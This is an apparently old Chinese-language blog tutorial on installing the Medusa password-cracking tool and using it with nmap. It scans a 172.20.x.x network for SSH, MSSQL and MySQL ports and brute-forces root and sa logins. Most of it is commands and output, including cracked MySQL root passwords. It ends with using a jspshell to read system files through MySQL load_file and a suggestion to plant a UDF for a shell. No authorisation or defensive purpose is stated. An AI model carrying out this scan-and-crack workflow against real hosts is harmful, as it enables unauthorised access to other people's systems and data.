ssh medusa 2.0 – linux下的經典密碼破解工具

***linux環境的網絡，口令破解是必不可少的。接下來介紹一款優秀的口令破解工具，首先先下載破解工具：

medusa 是一款不錯的口令破解軟件，速度也不錯，使用的時候，需要提供破解的ip，medusa本身不提供掃描功能，讀取ip也只能爲

 

單個ip，所以需要和nmap之類軟件配合使用獲取開放端口的ip列表。再設置要破解的用戶名字典和口令字典，即可破解。

./medusa -H vnc.txt -U name.txt -P pass.txt -M vnc -O r.vnc.ttx

vnc 爲要跑的開放了vnc的ip列表。

name.txt 用戶名字典

pass.txt 口令字典

r.vnc.txt 保存結果的文件。 

 

 

wget http://www.foofus.net/jmk/tools/medusa-2.0.tar.gz 或者curl -O http://www.foofus.net/jmk/tools/medusa-

 

2.0.tar.gz

 

如果沒有libssh2就裝個http://www.libssh2.org/download/libssh2-1.2.6.tar.gz

 

如果裝錯了就make uninstall再重裝個，裝完rm -rf libssh2-1.2.2，下面是安裝方法：

 

tar zxvf medusa-2.0.tar.gz

 

cd medusa-2.0

 

./configure

 當前的版本是2.0，不過有個疑似bug的地方。在centos下，默認編譯的時候沒有ssh模塊，但是看configure –help的時候，該模塊

 

默認是yes的，也就是應該有的。需要手動編譯時再指定一下這個模塊：

./configure –prefix=/tools/medusa –enable-module-ssh=yes

看看ssh在裏面沒->enable_module_ssh，沒有的話編譯是沒有ssh模塊的

 

./make

 

./make install

 

要是ubuntu,就sudo apt-get install libssh2，要是linux就像上面這麼麻煩了。

 

裝好後用medusa -d查看各個模塊是否正常，經常會現如下錯誤：

 

+ ssh.mod : Couldn’t load “/usr/local/lib/medusa/modules/ssh.mod” [libssh2.so.1: cannot open shared object file: 

 

No such file or directory

 

雖然已安裝了libssh但是找不到ssh路徑，這需要我們手工添加一個。etc 目錄 下面有一個 叫 ld.so.conf 的文件，指明 so 文件

 

默認路徑 ，一般的是 lib 和 usr lib ，編譯出來的裝在 usr local lib下了，所以要加一個，然後運行ldconfig，操作如下：

 

cat /etc/ls.do.conf

cat /etc/ld.so.conf

include ld.so.conf.d/*.conf

ls ld.so.conf.d/

 

echo /usr/local/lib > /etc/ld.so.conf.d/local.conf

cat /etc/ld.so.conf.d/*

/usr/local/lib

/usr/lib/mysql

/usr/lib/qt-3.3/lib

ls -l /usr/local/lib/libssh*

-rw-r--r-- 1 root root 752936 06-25 14:33 /usr/local/lib/libssh2.a

-rwxr-xr-x 1 root root 827 06-25 14:33 /usr/local/lib/libssh2.la

lrwxrwxrwx 1 root root 16 06-25 14:33 /usr/local/lib/libssh2.so -> libssh2.s

o.1.0.1

lrwxrwxrwx 1 root root 16 06-25 14:33 /usr/local/lib/libssh2.so.1 -> libssh2

.so.1.0.1

-rwxr-xr-x 1 root root 494064 06-25 14:33 /usr/local/lib/libssh2.so.1.0.1

 

ldconfig

 

最後再查詢一下有沒有ldd /usr/local/lib/medusa/modules/ssh.mod

 

配置好了路徑後，再用-d看看ssh模塊是否正常了。接下來就是medusa具體用法了：

 

# medusa

Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

 

ALERT: Host information must be supplied.

 

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

-h [TEXT] : Target hostname or IP address

-H [FILE] : File containing target hostnames or IP addresses

-u [TEXT] : Username to test

-U [FILE] : File containing usernames to test

-p [TEXT] : Password to test

-P [FILE] : File containing passwords to test

-C [FILE] : File containing combo entries. See README for more information.

-O [FILE] : File to append log information to

-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)

-M [TEXT] : Name of the module to execute (without the .mod extension)

-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a

different parameter each time and they will all be sent to the module (i.e.

-m Param1 -m Param2, etc.)

-d : Dump all known modules

-n [NUM] : Use for non-default TCP port number

-s : Enable SSL

-g [NUM] : Give up after trying to connect for NUM seconds (default 3)

-r [NUM] : Sleep NUM seconds between retry attempts (default 3)

-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.

-t [NUM] : Total number of logins to be tested concurrently

-T [NUM] : Total number of hosts to be tested concurrently

-L : Parallelize logins using one username per thread. The default is to process

the entire username before proceeding.

-f : Stop scanning host after first valid username/password found.

-F : Stop audit after first valid username/password found on any host.

-b : Suppress startup banner

-q : Display module’s usage information

-v [NUM] : Verbose level [0 - 6 (more)]

-w [NUM] : Error debug level [0 - 10 (more)]

-V : Display version

-Z [NUM] : Resume scan from host #

 

我們再看看medusa有哪些模塊支持什麼功能的破解：

 

# medusa -d

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

 

Available modules in “.” :

 

Available modules in “/usr/local/lib/medusa/modules” :

+ cvs.mod : Brute force module for CVS sessions : version 2.0

+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.0

+ http.mod : Brute force module for HTTP : version 2.0

+ imap.mod : Brute force module for IMAP sessions : version 2.0

+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0

+ mysql.mod : Brute force module for MySQL sessions : version 2.0

+ nntp.mod : Brute force module for NNTP sessions : version 2.0

+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0

+ pop3.mod : Brute force module for POP3 sessions : version 2.0

+ rexec.mod : Brute force module for REXEC sessions : version 2.0

+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0

+ rsh.mod : Brute force module for RSH sessions : version 2.0

+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0

+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0

+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0

+ snmp.mod : Brute force module for SNMP Community Strings : version 2.0

+ ssh.mod : Brute force module for SSH v2 sessions : version 2.0

+ telnet.mod : Brute force module for telnet sessions : version 2.0

+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0

+ vnc.mod : Brute force module for VNC sessions : version 2.0

+ web-form.mod : Brute force module for web forms : version 2.0

+ wrapper.mod : Generic Wrapper Module : version 2.0

 

支持的破解項目還是非常全面的，非常有利於***。首先我們確定目標，掃描開放ssh的機器，隨便找個段掃描一下吧。掃描整個段

 

開了22端口的機器， 並且判斷服務版本，保存到ssh文件中：

 

nmap -sV -p22 -oG ssh 172.20.3.0/24

 

Interesting ports on 172.20.3.132:

PORT STATE SERVICE VERSION

22/tcp filtered ssh

MAC Address: 00:1E:4F:16:B9:DB (Unknown)

 

Interesting ports on 172.20.3.133:

PORT STATE SERVICE VERSION

22/tcp filtered ssh

MAC Address: 00:1E:4F:13:09:E5 (Unknown)

 

Interesting ports on 172.20.3.134:

PORT STATE SERVICE VERSION

22/tcp filtered ssh

MAC Address: 00:1E:4F:13:72:49 (Unknown)

 

………………

 

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.3 (protocol 2.0)

MAC Address: 00:26:B9:5E:77:7A (Unknown)

 

Interesting ports on 172.20.3.148:

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 4.3 (protocol 2.0)

MAC Address: 00:26:B9:5E:79:D0 (Unknown)

 

Interesting ports on 172.20.3.150:

PORT STATE SERVICE VERSION

22/tcp closed ssh

MAC Address: 00:1E:4F:16:B8:2F (Unknown)

 

Interesting ports on 172.20.3.151:

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)

MAC Address: 00:1E:4F:16:B9:EF (Unknown)

 

Interesting ports on 172.20.3.152:

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)

MAC Address: 00:1A:A0:1C:0B:C2 (Unknown)

 

Interesting ports on 172.20.3.254:

PORT STATE SERVICE VERSION

22/tcp filtered ssh

MAC Address: 00:10:DB:FF:22:E0 (Juniper Networks)

 

Nmap finished: 256 IP addresses (64 hosts up) scanned in 33.634 seconds

cat ssh

# Nmap 4.11 scan initiated Fri Jun 25 15:25:50 2010 as: nmap -sV -p22 -oG ssh 17

2.20.3.0/24

Host: 172.20.3.12 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.13 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.16 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.19 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.28 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/

Host: 172.20.3.55 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.58 () Ports: 22/closed/tcp//ssh///

Host: 172.20.3.61 () Ports: 22/open/tcp//ssh//OpenSSH 4.3 (protocol 2.0)/

Host: 172.20.3.62 () Ports: 22/open/tcp//ssh//OpenSSH 3.9p1 (protocol 1.99)/

 

# Nmap run completed at Fri Jun 25 15:26:24 2010 — 256 IP addresses (64 hosts up) scanned in 33.634 seconds

 

類似這樣的，這裏我們要整理一下，把開了ssh的IP整理出來，現在明白oG保存的意義所在了

 

grep 22/open ssh | cut -d ” ” -f 2 >>ssh1.txt

 

cat ssh1.txt

 

172.20.3.28

172.20.3.61

172.20.3.62

172.20.3.63

172.20.3.64

 

加載ssh模塊進行ssh破解

medusa -H ssh1.txt -u root -P p.txt -M ssh

Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks

 

ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: aaaaaa (1 of 

 

51 complete)

ACCOUNT CHECK: [ssh] Host: 172.20.3.28 (1 of 39, 0 complete) User: root (1 of 1, 0 complete) Password: 1234 (12 of 

 

51 complete)

………………

破解需要漫長的等待，ssh破解並不快，建議字典包含十幾個到100個以內的常見密碼就可以了，否則跑的時間比較長。或者配置-G 

 

、-T提高些一些破解速度。

 

推薦還是掃一掃sql…

 

nmap -sV -oG mssql 172.20.0-5.1-254 -p1433 //掃描172.20.0.1-172.20.5.254

 

grep 1433/open mssql | cut -d ” ” -f 2 >>mssql.txt

 

medusa -H mssql.txt -u sa -P mssql_pass.dic -M mssql

 

沒有破出來，再試試破mysql：

 

# medusa -H mysql.txt -u root -P p.txt -M mysql -O pass.log //結果輸出到pass.log

 

cat pass.log

# Medusa v.2.0 (2010-06-26 10:42:32)

# medusa -H mysql.txt -u root -P p.txt -M mysql -O pass.log

ACCOUNT FOUND: [mysql] Host: 172.20.1.115 User: root Password: 12345678 [SUCCESS]

ACCOUNT FOUND: [mysql] Host: 172.20.3.58 User: root Password: mysql [SUCCESS]

# Medusa has finished (2010-06-26 10:55:11).

 

運氣還不錯，接着利用jspshell連上172.20.1.115的mysql操作：

select load_file(‘c:/boot.ini’);

 

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(2)\WINDOWS [operating systems] multi(0)disk(0)

 

rdisk(0)partition(2)\WINDOWS=”Windows Server 2003, Enterprise” /fastdetect /NoExecute=OptIn

 

原來是win2k3，可以繼續寫入個udf獲得shell…

 

最後附上官方說明：http://www.foofus.net/~jmk/medusa/ChangeLog